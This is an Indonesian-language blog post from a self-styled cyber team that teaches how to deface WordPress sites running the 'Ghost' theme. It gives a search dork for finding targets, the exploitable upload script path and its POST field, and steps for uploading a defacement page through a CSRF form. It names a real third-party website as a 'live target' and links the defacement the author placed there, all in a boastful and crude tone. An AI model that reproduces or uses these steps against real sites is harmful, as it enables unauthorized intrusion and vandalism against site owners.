»

Deface metode wp-ghost with csrf


 Assalamualaikum wr.wb 

Masih inget gw kan $ADMIN$ pasti inget lahh :v

Wkwkw

Ok langsung gass aja 

1.Dork:

Inurl:/wp-content/themes/Ghost/

2.exploit:/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Postfile:Filedata


Yoo tutor nyaa pertama lu ngedork

Dan gw ada live target wowkwok http://www.juvankoski.com/

Terus lu kasih Exploit http://www.juvankoski.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Klo vuln liat bawah

Terus ngapain lagi yahh ke csrf online lahh postfile lihat atas

Terus kunci target wkwkw upload SC kesayangan kalian

Akses??? /wp-content/uploads/settingsimages/SC.html

Bum bam bum kontol gede 

Akhirnya bisa juga ke upload 

Hasil gw http://www.juvankoski.com/wp-content/uploads/settingsimages/stct.html

Ok sekian dari gw 😁 assalamualaikum

SEKAR TAVAS CYBER TEAM

Postingan terkait:

Add Comment Edit Post

Belum ada tanggapan untuk "Deface metode wp-ghost with csrf"

Posting Komentar

Langganan: Posting Komentar (Atom)